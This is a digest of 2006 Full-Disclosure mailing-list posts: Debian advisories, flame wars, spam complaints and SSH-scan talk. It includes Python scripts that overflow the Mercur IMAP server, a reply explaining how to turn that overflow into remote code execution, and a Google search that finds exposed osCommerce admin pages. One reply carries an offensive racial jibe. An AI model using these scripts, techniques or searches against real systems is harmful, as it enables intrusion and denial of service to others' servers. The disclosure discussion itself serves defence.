
On 3/16/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> On Thu, 16 Mar 2006 21:32:11 +0100, Stefan Triller said:
> > What about closing this list for email adresses which aren't subscribed to 
> > it?
> > This would minimize the spam.
>
> Actually, it wouldn't, because the From: addresses are, for the most part,
> forged to show people who are actual subscribers - probably trawled out of
> a list archive.

Oh, that's definite and for sure. I unsubscribed from the list some
time ago, and resubscribed with a good old gmail account (thank you
google), which means that this moronic run against FD was something I
could just ignore (except for the work of deleting them). I received
an email from FD about "Post by non-member to a members-only list" and
suggesting I either wait patiently for moderator approval, or log on
and kill it. I was happy to do so (although I'm very sorry for John,
who must be drowning in that crap).

> Full-Disclosure - We believe in it.

I still do. Keep the faith, John.

--

NO CARRIER

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall.

[Simon Smith]

Mike,
I just had to respond to you.

Mike Owen wrote:
> On 3/16/06, Simon Smith <[EMAIL PROTECTED]> wrote:
>   
>> Flames like yours are useless. If you do not know how to answer the
>> question that I am asking, then just be quiet. Mark Coleman is one of
>> the few people that seems to have understood my question and provided me
>> with a viable solution. Again, thanks Mark!
>>
>> 
>
> Adriel or Simon or whatever the hell you're calling yourself these days,
>
>   
My real name is Alex Baxter, so feel free to call me Alex

> You're asking a bullshit question. 
Well they say that you catch flies with shit... seems to have caught you. ;]
> You're basically saying that ssl is
> broken, so you want to tunnel something through ssl that'll be secure
> if the ssl wasn't there. Don't fucking use ssl in the first place then
> if you don't like it.
>   
I'm not basically saying that SSL is broken, you're just not bright
enough to understand what I am saying (and you, like many others make
assumptions). I am saying that SSL has acceptable risks for certain
applications and non-acceptable risks for others. I am also saying that
I am looking for a way to secure "some" of the data going through the
SSL tunnel.
> I'm honestly quite surprised you haven't just replied to the list yet
> with the standard YHBT. YHL. HAND. That's all you are doing here, is
> just trolling, posting crap to get an argument going so you can sit
> back and laugh.
>   
Well, you are surprised because you are an idiot. You assume that I am
doing something that I am not doing.

I've actually had quite a few useful responses to my questions, none
from you of course. But to those who've helped me and understood what I
was asking, Thank You!

> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>   


-- 
Regards, 
Jackass


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006=% Buffer Overflow in Microsoft Access

[Dave Korn]

leToff wrote:
> Christian "Khark" Lauf wrote :
>
>> I know the owner. And it's definetly not an open proxy.
>
> *Yes it is:*
>
> Received: from fred.com (nsg93-x-xx-xx-xxx-xxx.fbx.proxad.net
> [xx.xx.xxx.xxx]) by new.toad.com (8.12.9/8.12.9) with SMTP id
> k2GAtcn6029611
> for [EMAIL PROTECTED]; Thu, 16 Mar 2006 02:56:17 -0800

  I don't see how you could tell from that received header whether the 
machine is a proxy, or whether it originated the traffic itself.


cheers,
  DaveK
-- 
Can't think of a witty .sigline today 



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] HTTP AUTH BASIC monowall

[Simon Smith]

Bkfsec,
Damn well put man! I am glad to see that I'm not the only one who
feels weary about this.

bkfsec wrote:
> [EMAIL PROTECTED] wrote:
>
>>
>> Been there, done that already.  There was a phishing run a while ago,
>> the guys even had a functional SSL cert for www.mountain-america.net
>> (the
>> actual bank was mntamerica.net or something like that..)
>>
>> Only real solution there is to get a good grip on what a CA is actually
>> certifying, which is a certain (usually very minimal) level of
>> *authentication*. They're certifying that somebody convinced them
>> that the cert
>> was for who they claimed it was for.  That's it.  Anybody who
>> attaches any
>> *other* meaning to it is making a big mistake.  In particular,
>> "authorization"
>> is totally out-of-scope here
>>
>> "You are now talking to the site that one of the CAs you trust thinks
>> belongs
>> to Frobozz, Inc.".
>>
>> If you don't trust that CA's judgment, you better heave their root
>> cert overboard...
>>
>>  
>>
> And even then, as your example points out, it's possible for the CA to
> have "good judgment" and still not issue a certificate that is
> labelled to who you or I might think it is.  Company naming is in the
> venue of trademark law... it's not up to the CAs to choose names for
> companies... I could start a company called "Microsoft Software LLC"
> and as long as I wasn't lying through my teeth the CA would be within
> their rights to issue the cert... the trick is that I'd probably not
> win a trademark battle in the courts and that during the lagtime in
> between, I'd probably be able to dupe quite a few people if I were so
> inclined (and I'm not).
>
> All verifying a cert proves is that the computer on the other end has
> the matching cert and that the certificate authorities say that the
> cert is still valid.  That's it.  Nothing else.
>
> Frankly, the whole "web of trust" is a flawed idea.  "Because A trusts
> B, and B trusts C, then A can (must?) trust C" is, excuse the lack of
> civility, utter bullshit.
> I trust my friends, it doesn't mean that I trust their friends.  In
> this case, it's even more flawed because we're not talking about
> trusting a friend of a friend... we're talking about trusting people
> that our friends have met on the street... and that's it.
>
> There's no better replacement for it at this moment, but the
> assumptions made in it are flawed beyond their targetted application.
>
>  -bkfsec
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/


-- 
Regards, 
Jackass


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1008-1] New kpdf packages fix arbitrary code execution

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1008-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
March 17th, 2006http://www.debian.org/security/faq
- --

Package: kdegraphics
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID : CVE-2006-0746

Marcelo Ricardo Leitner noticed that the current patch in DSA 932
(CVE-2005-3627) for kpdf, the PDF viewer for KDE, does not fix all
buffer overflows, still allowing an attacker to execute arbitrary
code.

The old stable distribution (woody) does not contain kpdf packages.

For the stable distribution (sarge) this problem has been fixed in
version 3.3.2-2sarge4.

The unstable distribution (sid) is not affected by this problem.

We recommend that you upgrade your kpdf package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.3.2-2sarge4.dsc
  Size/MD5 checksum: 1319 43ac45170bb03f24c1be932f3beec501

http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.3.2-2sarge4.diff.gz
  Size/MD5 checksum:   159241 9d94b3cba4d2d2fb5b214ff5b5474571

http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.3.2.orig.tar.gz
  Size/MD5 checksum:  7661488 6d0bb2c6e2e2f666d123778fbc520317

  Architecture independent components:


http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics_3.3.2-2sarge4_all.deb
  Size/MD5 checksum:17692 1fd89fbc3b1072a80806818830beb09e

  Alpha architecture:


http://security.debian.org/pool/updates/main/k/kdegraphics/kamera_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:92562 9756cb10bad8978c878b6da475f5eb0e

http://security.debian.org/pool/updates/main/k/kdegraphics/kcoloredit_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   109134 2a1bc7799e7c9031a11201db94639ae0

http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-dev_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:65048 4b6a0d038476996fbcc9f2741e39

http://security.debian.org/pool/updates/main/k/kdegraphics/kdegraphics-kfile-plugins_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   276348 d189ebedfc3724fc349b11a73d76f42a

http://security.debian.org/pool/updates/main/k/kdegraphics/kdvi_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   497636 cba504f0977a2aacae8c8e0372657eed

http://security.debian.org/pool/updates/main/k/kdegraphics/kfax_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   149382 b58fb0b7529c9e619fc55b92c3f0c0b9

http://security.debian.org/pool/updates/main/k/kdegraphics/kgamma_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:93010 c04d7190578341742f9077c219df8120

http://security.debian.org/pool/updates/main/k/kdegraphics/kghostview_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   246026 042a712f9cca7460ae706f4f080038de

http://security.debian.org/pool/updates/main/k/kdegraphics/kiconedit_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   159650 feb5a5e8b17b905304e028fad7cc

http://security.debian.org/pool/updates/main/k/kdegraphics/kmrml_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   244612 6901c4aeca5c4a0d2d19aa673dff9608

http://security.debian.org/pool/updates/main/k/kdegraphics/kolourpaint_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   831252 0a65b6094e8d00922c5fa27a7c70f08a

http://security.debian.org/pool/updates/main/k/kdegraphics/kooka_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   774118 b52f9da62fc434195fcd1282071cedb9

http://security.debian.org/pool/updates/main/k/kdegraphics/kpdf_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   534596 c584bd053abf9f7f1bb3978e2a6ee14c

http://security.debian.org/pool/updates/main/k/kdegraphics/kpovmodeler_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:  2317606 405e0561885de7f3e90b3f045c7a6955

http://security.debian.org/pool/updates/main/k/kdegraphics/kruler_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:63458 1e766cf8f2384f66a7666a6cac43ffd0

http://security.debian.org/pool/updates/main/k/kdegraphics/ksnapshot_3.3.2-2sarge4_alpha.deb
  Size/MD5 checksum:   103144 0d78edf28f8f97741c6a0a16fdc23b9f

http://security.debian.org/pool/update

RE: [Full-disclosure] What about subscriber only?

[Grant Rietze]

Tough call, deciding whether FD has enough
intrinsic value to be worth bothering with adapting rules to filter the latest
DDOS on it.

 

I’m still on the fence.

 











From: Gareth Davies [mailto:[EMAIL PROTECTED] 
Sent: March 16, 2006 11:07 PM
To: php0t
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure]
What about subscriber only?



 

php0t wrote: 

I know that and I wrote it already!I just said, it would minimize the problem, not solve it.All other mailing lists I'm subscribed to handle it in this way and    

there   

isn't much spam...    

   This isn't just spam, this is a deliberate flood of mails.If they can't send it from whatever-address, they're going to use alist of subscribed users` email addresses, and send just as muchmail.   

Last one was pretty easy to delete.

Just delete all mails with a Received header that contains kundencontroller.de

Done.




-- Gareth Davies - BS7799 LA, OPST Manager - Security Practice Network Security Solutions MSC Sdn. Bhd.Suite E-07-21, Block E, Plaza Mont' Kiara, No. 2 Jalan Kiara,Mont’ Kiara, 50480Kuala Lumpur, Malaysia Phone: +603-6203 5303 or +603-6203 5920 www.mynetsec.com






___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] MSN Passport Cert improperly issued

[Babak Pasdar]

I am not sure if this has been brought up before but...

It seems that MSN's cert for private login to the passport site is
issued for the wrong domain.  

https://login.passport.net/uilogin.srf?lc=1033&id=30017


Babak


Engage in the Daily Security Briefing (DSB) Community Site:
http://dsb.igxglobal.com

New! DSB/Week-in-Review for Week.10 March'06:

Video...
http://dsb.igxglobal.com/page.php?25

Audio...
http://dsb.igxglobal.com/media/dsb-WeekinReview-10.06.mp3

Podcast...
http://dsb.igxglobal.com/plugins/podcast/podcast.php



signature.asc
Description: This is a digitally signed message part


_
igxglobal utilizes state of the art technology from PGP to ensure the safeguard 
of all electronic correspondences.  This message could have been secured by PGP 
Universal. To secure future messages from this sender, please click this link 
and contact your representative at igxglobal for further information:

https://keys.igxglobal.com/b/b.e?r=full-disclosure%40lists.grok.org.uk&n=4Njq7juzEf1Yn9MHjRn9Ow%3D%3D




___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

[KF (lists)]

Lets get a little more specific even:

Art. L121-4 seem to look like a good way to prevent them from selling 
your code.


http://en.wikipedia.org/wiki/French_copyright_law


   Moral rights

French copyright law treats a protected work as an extension of the 
personality of the author which is protected by a certain number of 
moral rights. In general, the author has the right to "the respect of 
his name, of his status as author, and of his work" (Art. L121-1). The 
following rights are usually recognised:


   * right of publication (/droit de divulgation/): the author is the
 sole judge as to when the work may be first made available to the
 public (Art. L121-2).
   * right of attribution (/droit de paternité/): the author has the
 right to insist that his name and his authorship are clearly stated.
   * right to the respect of the work (/droit au respect de l'intégrité
 de l'oeuvre/): the author can prevent any modification to the work.
   * right of renouncal (/droit de retrait et de repentir/): the author
 can prevent further reproduction, distribution or representation
 of the work (Art. L121-4).
   * right to protection of honour and reputation (/droit à s'opposer à
 toute atteinte préjudiciable à l'honneur et à la réputation/)

...

Art. L122-5 defines the exceptions to French copyright law, which are 
relatively restricted.


Once a work has been published, the author cannot prevent:

   1. Private family perfomances.
   2. Copies for the private and personal use of the copier. This
   provision does not apply to works of art, computer programs (where a
   single safeguard copy is allowed, Art. L122-6-1-II) and databases.
   3. In cases where the name of the author and the source are clearly
   indicated,

   a) Analyses and short citations justified by the critical,
   polemical, scientific or pedagogical nature of the work.
   b) Press reviews.
   c) Diffusion of public speeches as current news.
   d) Reproductions of works of art in catalogues for auctions in
   France (subject to regulatary restrictions).

   4. Parody, pastiche and caricature, "taking into account the usage
   of the genre".
   5. Acts necessary to access a database within the limits of the
   agreed use.

The is no specific provision for government works or laws: the copyright 
is normally held by the relevant public body.



-KF

Thierry Zoller wrote:


Dear Rembrandt,

rjd> If you puplish something without a license it is OPEN DOMAIN
rjd> That means people can use it, modify it, sell it...
That's bull. It's vice versa, meaning even if I just put something new
somehwere on the web, the author inherently holds copyright.
-BERN convention.

Please don't spread that FUD any further.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



 



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Re: Remote overflow in MSIE script action handlers (mshtml.dll)

[Michal Zalewski]

On Thu, 16 Mar 2006, Michal Zalewski wrote:

> This might not come as a surprise, but there appears to be a *very*
> interesting and apparently very much exploitable overflow in Microsoft
> Internet Explorer (mshtml.dll).

I'd like to make a self-serving statement in response to dozens of people
who pointed out that this month, iDefense pays $10,000 per any
vulnerability that would result in a Microsoft security advisory rated
"critical"...

YES, I HAVE THIS KNOWLEDGE.

I simply do not subscribe to that way of making money. It might be that
I'm insane or dumb, but it feels good.

Regards,
/mz
http://lcamtuf.coredump.cx/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mercur IMAPD 5.0 SP3 DoS Exploit or more?

[3APA3A]

Dear Tim Taylor,

Same bug was reported for 4.2, see
http://www.security.nnov.ru/news2164.html

A  common  exploitation  solutions  is  placing  the  rest  of shellcode
somewhere  else  on  the memory. In the best case you can place it after
"\r\n",  may  be  "\r\n\0..."  in  the same send() buffer, if vulnerable
application  limits  the  length  of  the string, but receives data into
larger  buffer. You can also use command tag (a001 in example), hostname
or  another  controlled  data  that  finally can be found in the process
memory.

In  the  worst  case you have nothing to control in memory, 135 bytes is
enough  to simply recv() the rest of shellcode. With suggestion there is
no  more  current  connections,  socket number will be always same. Even
more:  you  can bypass non-executable stack protection by calling recv()
with some known to be allocated dynamic memory address as a buffer using
return-into-library   technique   (see   Solar  Designer's  article)  by
overwriting  saved  EIP  with  recv()  address.  To  have  received code
executed  you should place buffer address on the stack in a place recv()
expects saved EIP. That is your stack buffer contains no shellcode, but:

flags
len
buf
s
...
buf ;again, as an address recv() use as saved EIP
...
recv;address of recv function from winsock library overwrites saved EIP

--Friday, March 17, 2006, 12:30:44 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

TT> Hi folks,

TT> I found this bugs in a imap-server called Mercur IMAP 5.0 SP3 from
TT> http://www.atrium-software.com/, but i was not able to exploit it successful
TT> for a remote shell on WinXP ServicePack2. The program has an intern check
TT> for the string length or something like that. I can overwrite the EIP
TT> successfully but can not put my shellcode behind the EIP. Because of this
TT> fact i have to write the shellcode in front of the EIP and this results in a
TT> 135 byte for the shellcode without the required "a login" or "a select".
TT> Perhaps someone has a clue and can solve this problems and teach me some
TT> lessons for the future.

TT> -- DoS Exploit --
TT> # Atrium Mercur IMAP 5.0 SP3 DoS Exploit
TT> # pre authentifcation buffer overflow in imap command login
TT> import socket
TT> s=socket.socket()
TT> s.connect(("127.0.0.1", 143))
TT> print s.recv(256)
TT> s.send("a001 login "\x41" * 275 + "\r\n")

TT> # buffer overflow in imap commands like select and others
TT> import socket
TT> s=socket.socket()
TT> s.connect(("127.0.0.1", 143))
TT> print s.recv(256)
TT> s.send("a001 login test test\r\n")
TT> print s.recv(256)
TT> s.send("a002 select " + "\x41" * 239 + "\r\n")

TT> By the way at the first look it seems to be like some older bugs of this
TT> piece of software but I do not think so.

TT> Cheers

TT> Tim Taylor



-- 
~/ZARAZA
Есть там версии Отелло, где Дездемона душит Мавра. (Лем)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] -ADVISORY- % =Thu Mar 16 13:23:37 EST 2006= % Buffer Overflow in Microsoft Access

[leToff]

Christian "Khark" Lauf wrote :

> I know the owner. And it's definetly not an open proxy.

*Yes it is:*

Received: from fred.com (nsg93-x-xx-xx-xxx-xxx.fbx.proxad.net [xx.xx.xxx.xxx])
by new.toad.com (8.12.9/8.12.9) with SMTP id k2GAtcn6029611
for [EMAIL PROTECTED]; Thu, 16 Mar 2006 02:56:17 -0800


-- 
leToff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] SSH Scans - Homebrew dictionary

[php0t]

Google a couple of words that were tried, and you'll probably find the
whole list.

Fun: make a valid user/pass that is likely to come up based on that
dictionary.
For ftp, just check out what they upload. For SSH, just force them to
use a screened shell and watch what they're trying to do and when you
get bored with it or just simply don't like what you see, you can always
filter outgoing data or just disconnect the poor bastard. Manual
honeypot, we could say.. :-)

  ciao
php0t



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michel
Pereira
Sent: Friday, March 17, 2006 12:33 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] SSH Scans - Homebrew dictionary


   Hey Perfect Material, I'm Brazilian too :)
   I'm not racist with my own country, I only talk about it because the
various Brazilian words that is in the log files and hosts that come the
scans.

Bye

On 3/17/06, PERFECT. MATERIAL <[EMAIL PROTECTED]> wrote:
>
> Michel,
>
> I highly doubt any Brazilian citizen would be involved with such 
> malicious behavior. Please rescind your inflammatory and racist 
> statement or risk gaining a reputation as a person who dislikes his 
> fellow brown person. It's because of people like you that Eazy-E died 
> of AIDS.
>
> PERFECT.MATERIAL
>
> I
>
>
> On 3/16/06, Michel Pereira <[EMAIL PROTECTED]> wrote:
> >
>   After of seeing a lot of ssh scans on my firewalls and home PC, I 
> made a script that filters out the "Invalid User" entry inside 
> /var/log/messages and do some cleaning process, the result is a 
> dictionary (homebrew) of users that tried to login into my hosts.
>   Into the dictionary I saw english and Brazilian Portuguese words, 
> maybe we have Brazilian hackers running scan bots too.
>   This work is only for experiment and curiosity to see what is 
> happening with Internet today, you can get the script and dictionary 
> in http://www.michel.eti.br/2006/03/ssh-scans.html
>
>   If you have a better idea of sugestion, please mail me: 
> "[EMAIL PROTECTED]"
>
> Bye
> --
> Só Jesus salva,o homem faz backups.
>  http://www.michel.eti.br
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
Só Jesus salva,o homem faz backups.
http://www.michel.eti.br

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Simple Oscommerce Google inurl trick

[Julien GROSJEAN - Proxiad]

It returns a lot of things... :)

Joshua Zukerman a écrit :

A quick search didn't return anything on the Google Hacking Database.
Submit it here: http://johnny.ihackstuff.com/index.php?module=prodreviews

On 3/6/06, Jodi Middleton <[EMAIL PROTECTED]> wrote:

Simply google inurl trick for Oscommerce for open administrator page.
If no .htpassword is set for the admin folder of osCommerce then of
course you can change any setting in the shop unless password security
has been enabled on the admin console.

Search google for;
inurl:"/admin/configuration. php?" Mystore

Despite a few demo pages there are a few open admin pages for webshops.
Simple patch if you are one is to place a .htpassword file in the root
of the admin folder.

-- J.R.Middleton
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] SSH Scans - Homebrew dictionary

[Michel Pereira]

   Hey Perfect Material, I'm Brazilian too :)
   I'm not racist with my own country, I only talk about it because
the various Brazilian words that is in the log files and hosts that
come the scans.

Bye

On 3/17/06, PERFECT. MATERIAL <[EMAIL PROTECTED]> wrote:
>
> Michel,
>
> I highly doubt any Brazilian citizen would be involved with such malicious
> behavior. Please rescind your inflammatory and racist statement or risk
> gaining a reputation as a person who dislikes his fellow brown person. It's
> because of people like you that Eazy-E died of AIDS.
>
> PERFECT.MATERIAL
>
> I
>
>
> On 3/16/06, Michel Pereira <[EMAIL PROTECTED]> wrote:
> >
>   After of seeing a lot of ssh scans on my firewalls and home PC, I
> made a script that filters out the "Invalid User" entry inside
> /var/log/messages and do some cleaning process, the result is a
> dictionary (homebrew) of users that tried to login into my hosts.
>   Into the dictionary I saw english and Brazilian Portuguese words,
> maybe we have Brazilian hackers running scan bots too.
>   This work is only for experiment and curiosity to see what is
> happening with Internet today, you can get the script and dictionary
> in http://www.michel.eti.br/2006/03/ssh-scans.html
>
>   If you have a better idea of sugestion, please mail me:
> "[EMAIL PROTECTED]"
>
> Bye
> --
> Só Jesus salva,o homem faz backups.
>  http://www.michel.eti.br
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
Só Jesus salva,o homem faz backups.
http://www.michel.eti.br

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] XCon2006 Call For Paper

[XFOCUS Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

XCon2006 Call For Paper

  XCon2006 the Fifth Information Security Conference will be held
in Beijing, China, during August 18-20, 2006. China has long been
known as a famous cultural country, while Beijing is the most
splendid place in its history. It can date back to 1000 BC, when
our ancestors already live and multiplied here and 34 emperors
issued orders and govern the nation successively. There has been
a very mysterious atmosphere around this old culture city, in which
we express our advancements and personalities, exchange our
technologies and experiences, and share our achievements and
excellences.

  August is the season of harvest, as well as share. These security
professionals at the vanguard of leading information security
technology will share research and unique experience with zealots
from all over the world, and the speakers to be presented in the
conference are among the best, the most intelligent. These
professionals have assembled unique new material that they will
present at this conference to help you maintain your leadership
in this severely competitive technological field, and it must be
the most memorable experience in your life journey.

  This three-day conference will be held in a relaxed and cozy
atmosphere, which will provide an international communion platform
for the information security professionals,technicians,security
supervisors,managers, and hacker technology fans. They say their
says and show themselves as much as they like. It is not only a
brilliant symposium, but more importantly, a "party", a "party"
to share the joy of success.

  Welcome to our event and discover amazing China!
Don't hesitate, and join us!

  Target people to participate in the event: any person who is
devoted to information security,including information security
professional,Internet security hobbyist,administration engineer
of networks ,security consultant of networks and CIO and so forth.


SPEAKERS PRIVILEGES
  Speaker whose presentation has been accepted by XCon will
participate in this event to make a speech by himself. They will
enjoy the following privileges:
  * Return economy class air-ticket for one person
  * Hotel accommodation
  * Breakfast, lunch and dinner during conference
  * After-conference party
  * We will organize the speakers to visit some of the famous
historical sites during the day after the meeting, and taste
the flavors in Beijing.
Note?
  * Speakers must offer relevant bill voucher.
  * XCon will be the final arbitrator on this matter.

Please feel free to email XCon at [EMAIL PROTECTED] for the further
information,details and consultation or contact us via
MSN: [EMAIL PROTECTED]


SUBMISSION REQUIREMENTS
Submission must include the following information:
1) Brief biography including list of publications and papers
  published previously.
2) Abstract of speakers' educational or job experience.
3) Contact Information: full name, alias,country of origin ,
  net nickname, e-mail, phone, fax,photo, company address,
  any IM contact details (msn, ICQ, YM, AIM, or any other),
  and special dietary requirement.
4) Speaking details
How long the speech will last
Whether to release new tools
Whether to release new vulnerability
Whether to release new Exploit code
5) Why is your material different or innovative or significant
  or an important tutorial?
6) All submission must include PPT and WORD in English or
  Chinese in either MS Office or OpenOffice format.

  Please send submission to [EMAIL PROTECTED] for selection.
Submission must be done no later than July 1st 2006.The date of
final notification of acceptance or rejection is July 10th 2006.
Whether your Presentation Material is accepted or not, we will
contact you by the information you offer.


IMPORTANT DATES
* Final Submission?July 1st 2006.
* Notification of Acceptance or Rejection?July 10th 2006.


TOPICS
The scopes of topics are broad and include, but not restricted
to the following areas:
- --- Application Security
   - Web Application vulnerability research
   - Automatic Vulnerability Discovery
   - Database Security and hacking
   - Protocol exploits
   - Trojans, Worms , Malware Technology
   - Encrypt,Decrypt,Crack Technology
- --- Intrusion Detection/Forensics Analysis
   - File systems analysis and recovery,
   - Runtime Structures (stack/swap/..) Data recovery,
   - Reverse Engineering (malware analysis, vulnerability research),
   - Intrusion Detection and Evasions technologies
   - Honeypot / HoneyNet related technologies

- --- Wireless and VoIP security
   - 802.11x, CDPD, Bluetooth, WAP/TDMA, GSM, SMS, 3G Technology
   - PDA and Mobile phone protocol analysis
   - Palm, Pocket Pc security
   - Wireless gateway
   - VoIP security and vulnerability analysis
   - Secure WLANs, vulnerabilities and analysis
- --- P2P Technology
   - Instant message tools (MSN, Skype, ICQ, etc)
   - Chatting tools (IRC, web Chat, etc)
   - P2P down

Re: [Full-disclosure] SSH Scans - Homebrew dictionary

[Fajar Edisya Putera]

how about using sshdfilter, it's working fine with me
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re[2]: [Full-disclosure] FrSIRT Puts Exploits up for Sale

[Thierry Zoller]

Dear Rembrandt,

rjd> If you puplish something without a license it is OPEN DOMAIN
rjd> That means people can use it, modify it, sell it...
That's bull. It's vice versa, meaning even if I just put something new
somehwere on the web, the author inherently holds copyright.
-BERN convention.

Please don't spread that FUD any further.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1007-1] New drupal packages fix several vulnerabilities

[Martin Schulze]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1007-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
March 17th, 2006http://www.debian.org/security/faq
- --

Package: drupal
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE IDs: CVE-2006-1225 CVE-2006-1226 CVE-2006-1227 CVE-2006-1228


The Drupal Security Team discovered several vulnerabilities in Drupal,
a fully-featured content management and discussion engine.  The Common
Vulnerabilities and Exposures project identifies the following
problems:

CVE-2006-1225

Due to missing input sanitising a remote attacker could inject
headers of outgoing e-mail messages and use Drupal as a spam
proxy.

CVE-2006-1226

Missing input sanity checks allows attackers to inject arbitrary
web script or HTML.

CVE-2006-1227

Menu items created with the menu.module lacked access control for,
which might allow remote attackers to access administrator pages.

CVE-2006-1228

Markus Petrux discovered a bug in the session fixation which may
allow remote attackers to gain Drupal user privileges.

The old stable distribution (woody) does not contain Drupal packages.

For the stable distribution (sarge) these problems have been fixed in
version 4.5.3-6.

For the unstable distribution (sid) these problems have been fixed in
version 4.5.8-1.

We recommend that you upgrade your drupal package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:

http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.dsc
  Size/MD5 checksum:  611 71b0ecbc47f9cca214a283ebec5e4600
http://security.debian.org/pool/updates/main/d/drupal/drupal_4.5.3-6.diff.gz
